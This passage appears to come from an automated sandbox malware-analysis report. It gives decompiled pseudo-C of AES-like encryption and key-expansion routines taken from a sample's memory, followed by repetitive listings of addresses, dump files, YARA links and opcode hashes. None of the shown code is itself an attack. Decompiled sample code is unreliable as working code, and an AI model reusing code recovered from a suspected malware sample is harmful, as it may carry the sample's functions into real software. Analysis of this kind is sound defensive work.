						_t602 =  *(__eax + 4 + (_t559 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t559;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t559 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				_t411 = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00;
				asm("rol edi, 0x8");
				 *_t358 =  *_t358 + _t411;
				asm("iretd");
				_t358[3] = _t411;
				return _t274;
			}




















                                                        0x00402fb0
                                                        0x00402fbf
                                                        0x00402fc8
                                                        0x00402fd6
                                                        0x00402fda
                                                        0x00402fe3
                                                        0x00402ff4
                                                        0x00402ff7
                                                        0x00402ffc
                                                        0x00403005
                                                        0x00403013
                                                        0x00403018
                                                        0x00403021
                                                        0x00403031
                                                        0x00403051
                                                        0x00403054
                                                        0x00403066
                                                        0x0040306b
                                                        0x00403080
                                                        0x0040309d
                                                        0x004030a0
                                                        0x004030b1
                                                        0x004030c6
                                                        0x004030e6
                                                        0x004030e9
                                                        0x004030fb
                                                        0x00403119
                                                        0x00403136
                                                        0x00403139
                                                        0x0040314b
                                                        0x00403160
                                                        0x00403166
                                                        0x0040316e
                                                        0x0040316f
                                                        0x00403172
                                                        0x00403180
                                                        0x00403190
                                                        0x004031a2
                                                        0x004031b4
                                                        0x004031d0
                                                        0x004031e3
                                                        0x004031f0
                                                        0x00403201
                                                        0x00403218
                                                        0x0040323a
                                                        0x0040323d
                                                        0x0040324e
                                                        0x00403269
                                                        0x00403280
                                                        0x00403283
                                                        0x00403295
                                                        0x0040329d
                                                        0x004032b2
                                                        0x004032cf
                                                        0x004032d2
                                                        0x004032e3
                                                        0x00403307
                                                        0x00403317
                                                        0x0040331a
                                                        0x0040332c
                                                        0x00403344
                                                        0x00403347
                                                        0x0040335a
                                                        0x00403367
                                                        0x00403379
                                                        0x00403391
                                                        0x004033b4
                                                        0x004033b7
                                                        0x004033c9
                                                        0x004033de
                                                        0x004033e4
                                                        0x004033e4
                                                        0x004033e7
                                                        0x004033e7
                                                        0x00403180
                                                        0x0040344b
                                                        0x00403454
                                                        0x00403462
                                                        0x004034c0
                                                        0x004034c9
                                                        0x004034d7
                                                        0x00403539
                                                        0x00403542
                                                        0x0040354f
                                                        0x00403552
                                                        0x0040359e
                                                        0x004035aa
                                                        0x004035ad
                                                        0x004035b3
                                                        0x004035bb
                                                        0x004035bd
                                                        0x004035c0
                                                        0x004035c7

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                        • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                        • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BF2622, Relevance: .4, Instructions: 398COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb58d2bd9c842f9be05c8f1d0f1a847d1ab92e89daf1d55b05597ca56ccec852
                                                        • Instruction ID: b97e7ad719b41d8c59167cb08c46832efaba449de07e46820f642eb5d334e1e1
                                                        • Opcode Fuzzy Hash: bb58d2bd9c842f9be05c8f1d0f1a847d1ab92e89daf1d55b05597ca56ccec852
                                                        • Instruction Fuzzy Hash: 47E1BF342146598FD728CF19C0A06B2B7E1EF55350F14C4DEEAE68B692E334EC5AEB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B5C7BC, Relevance: .3, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a18cfbab279ac3d3be162841f96d0eac2a379d6d98e0f297657f4362180874eb
                                                        • Instruction ID: f08d931a800b1e2c6cd32e7957e556e724bd3248f7273126b16dce85bfebcd80
                                                        • Opcode Fuzzy Hash: a18cfbab279ac3d3be162841f96d0eac2a379d6d98e0f297657f4362180874eb
                                                        • Instruction Fuzzy Hash: 23C10F70508256EEDB24CF24C885BBBBBF5EF06300F1444D9E8968BA81D375E845EBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6905A, Relevance: .3, Instructions: 283COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30a80c71e25019c4327a82a121550cc67116fa97d44b50b1c6140f21b1af2549
                                                        • Instruction ID: 2d520053c9884785eb297a53a6fddec0c8d2aa0465f15fc1c4fb789e1a3ca94d
                                                        • Opcode Fuzzy Hash: 30a80c71e25019c4327a82a121550cc67116fa97d44b50b1c6140f21b1af2549
                                                        • Instruction Fuzzy Hash: 65B18C31A002559BDB34CF68CC84BBAB3F9EF45710F1485DAE94AE7291D7749D84CB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B4E2E9, Relevance: .3, Instructions: 280COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 246a888ca68a1dc085ffaae3e0f35ca3382ab1cb49dd86c4a39abba739f333a6
                                                        • Instruction ID: 57ae3455809d65e7da32684b46644370f9a7d4ab1c311bfd074a9bd5ab62f315
                                                        • Opcode Fuzzy Hash: 246a888ca68a1dc085ffaae3e0f35ca3382ab1cb49dd86c4a39abba739f333a6
                                                        • Instruction Fuzzy Hash: CEC1BF70A00615CFCB24CF59C4807ACB7F2FF89324F2882AAD865AB791D734AD46DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B4FBD7, Relevance: .3, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10e585330df50dfe27eda60c1b483f0f94712ef40964151c60a93076343f7544
                                                        • Instruction ID: 43dcec595f30a72e029afed9c8958a483576649462f7977fda2bb663962d0ae8
                                                        • Opcode Fuzzy Hash: 10e585330df50dfe27eda60c1b483f0f94712ef40964151c60a93076343f7544
                                                        • Instruction Fuzzy Hash: 7991C171D0425A8BCF34DF94C4906FDB7F1FF55700FA840AAD892A7286EB349982DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B77B00, Relevance: .3, Instructions: 252COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                        • Instruction ID: 709d31cdffada1fb948f9f50374b5d9b0e073c48dcab360dab2321aacc592b8f
                                                        • Opcode Fuzzy Hash: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                        • Instruction Fuzzy Hash: 287158316192558FDB159A38C4D06BE37E2EB92304B34C2F6E466CB78ADA70D847E351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BF63BF, Relevance: .2, Instructions: 233COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                        • Instruction ID: 36e7f4f9482069ab80d8624eda7492fd50bc5f91fee509eba0f363316d7ce766
                                                        • Opcode Fuzzy Hash: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                        • Instruction Fuzzy Hash: 9A915F72510B0EDFD725CF28C486676BBE0FF15354B248A98D9E6D76A0C334E959DB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B4E0C6, Relevance: .2, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 996ccd1c98960b6139fc8a6bec5fd85c1ea5f4df90146169d79a62d783c17d9a
                                                        • Instruction ID: c52fe599e08cd4bf05104614b050aa0e50d42034339b8a4a8b856d4b53c2d300
                                                        • Opcode Fuzzy Hash: 996ccd1c98960b6139fc8a6bec5fd85c1ea5f4df90146169d79a62d783c17d9a
                                                        • Instruction Fuzzy Hash: A981CA71A002499FDF25CF69C885BAEBBF5FF40714F1485E8E8269B282D334DA05DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B80D3B, Relevance: .2, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                        • Instruction ID: 6e22c344c38d45e70304024ebb1b7e5fda6a17e23e220a8925aa05d041981f39
                                                        • Opcode Fuzzy Hash: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                        • Instruction Fuzzy Hash: 60917A74604205DFDF29DFA5C490EBABBF6EF49300F2580E9D8865B262D738AC45CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B7D005, Relevance: .2, Instructions: 221COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71c84f795433c710a10f17311d293ed25162decbc98f19a15a5689da1dab8e4c
                                                        • Instruction ID: b02ecf42a1a2a2edae2dd2260c0c613a24227b91cd527edefe691150568d3194
                                                        • Opcode Fuzzy Hash: 71c84f795433c710a10f17311d293ed25162decbc98f19a15a5689da1dab8e4c
                                                        • Instruction Fuzzy Hash: CA91F472914226CBCB248F05C4902B93BE2FF64751B2580AEFC954F792D734D9A2E7E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BEF8EE, Relevance: .2, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 290e51f92d169eb0c6f28f349a5f505e5f7e9f5d7f29c0ac44e9971cd3b7ce8a
                                                        • Instruction ID: 72ce68c9ea09673478004f136e84d33cf6ab87e60424602d4345c97d4ea7a026
                                                        • Opcode Fuzzy Hash: 290e51f92d169eb0c6f28f349a5f505e5f7e9f5d7f29c0ac44e9971cd3b7ce8a
                                                        • Instruction Fuzzy Hash: F061C2319002A29FDB248F22C498BBBBBF1EF56754F55D1F8E4492F295C334A942CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B9A37B, Relevance: .2, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 44cfbdaf97f247036074a7b3ea78d686c2cf984dbe82054d6af5d36fb659cd54
                                                        • Instruction ID: f7e50020f9d1e75d6da84cb7c11044509c5965d15a314b03a76a523bd73ffd58
                                                        • Opcode Fuzzy Hash: 44cfbdaf97f247036074a7b3ea78d686c2cf984dbe82054d6af5d36fb659cd54
                                                        • Instruction Fuzzy Hash: 7151D173E105259BE3408E29CC40259B6A3EBC4314F2FC279DC289B385DAB9ED12C6C0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B85485, Relevance: .2, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d61166358878265cf848ea01cc5b262078027f89681af19bf91a227e13f39e4a
                                                        • Instruction ID: 2c58179f6a44d61a9dd0b1b585a3edf54e8a8d60b39c489490ed79eeda2a4bbd
                                                        • Opcode Fuzzy Hash: d61166358878265cf848ea01cc5b262078027f89681af19bf91a227e13f39e4a
                                                        • Instruction Fuzzy Hash: BA5117B6E60561DBCB29CB1E8C4436CB7E2FB8831272E81E7D855D7766CA309C42C784
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
